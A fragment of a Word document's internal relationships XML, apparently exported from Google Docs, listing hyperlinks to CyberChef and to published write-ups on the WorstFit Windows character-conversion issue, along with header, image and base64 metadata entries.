Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gchq.github.io/CyberChef/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://worst.fit/worstfit/Arg-Splitting/tar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2.jpg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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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GRk89dm49BP8VU2M1QtbS5kqjQ==">CgMxLjAyDmgueGdya3A0bXIxcG02Mg5oLmQ2cWFlcWxibG1xczIOaC5ndXgyZWhmNTBpZ3gyDmgubWhwaWgxcmlrb2hhMg5oLmhjZGM5bTZneHozYjIOaC44YXFsNDNweW9vZmEyDmgub201bnBob3A1N2xvOAByITF2RzE0R0RCQWNiOWgyMkc1Z0RVcThYbXdJZ3VBcVUyeg==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